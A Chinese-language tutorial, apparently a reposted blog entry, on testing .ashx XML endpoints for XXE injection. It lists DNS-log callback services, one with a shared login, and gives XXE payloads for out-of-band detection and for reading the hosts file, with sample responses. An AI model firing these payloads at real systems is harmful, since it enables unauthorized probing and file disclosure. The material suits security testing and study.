特征
-
特征1 --- .ashx
看到url是 .ashx后綴的
-
特征2 --- 回應體是xml
發現有這些特征都可以用下面的流程測驗
測驗
在線工具:
http://ceye.io/
http://www.dnslog.cn/
https://dnslog.io/
http://admin.dnslog.link/ 賬號:test 密碼:123456
我這里用www.dnslog.cn舉例
注意
發包需要修改格式:
Content-Type: application/xml
pyload
把http://127.0.0.1:80替換成你的Get SubDomain
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY % xxe SYSTEM "http://127.0.0.1:80" > %xxe; ]>
# or
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://127.0.0.1:80">
]>
<r>&sp;</r>
然后點Refresh Record,有訪問記錄就說明666了,
任意讀取檔案測驗
原理就是構造一個可以訪問系統默認檔案hosts的Pyload,然后看看回應,看他說缺啥補充啥,如果是回顯型XXE就會將組態檔的資訊列印出來,
file:///c:/windows/system32/drivers/etc/hosts
file:///etc/hosts
# pyload
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
]>
<r>&sp;</r>
# response
<?xml version="1.0" encoding="utf-8"?><response><header><actionCode>1</actionCode><rspType>7</rspType><rspCode>9011</rspCode><rspDesc><![CDATA[請求報文頭部不能為空]]></rspDesc><digitalSign /><rspTime>2020-04-09 16:58:34.877</rspTime></header><body></body></response>
# pyload
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///c:/windows/system32/drivers/etc/hosts1">
]>
<r>&sp;</r>
# response
<?xml version="1.0" encoding="utf-8"?><response><header><actionCode>1</actionCode><rspType>7</rspType><rspCode>7000</rspCode><rspDesc><![CDATA[介面程式執行錯誤]]></rspDesc><digitalSign /><rspTime>2020-04-09 17:01:08.121</rspTime></header><body></body></response>
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/30931.html
標籤:其他
上一篇:WZP身份溯源策略(World Zero Protection),宜分宜合、自主可控的實名認證體系
下一篇:GPS授時服務器的技術引數介紹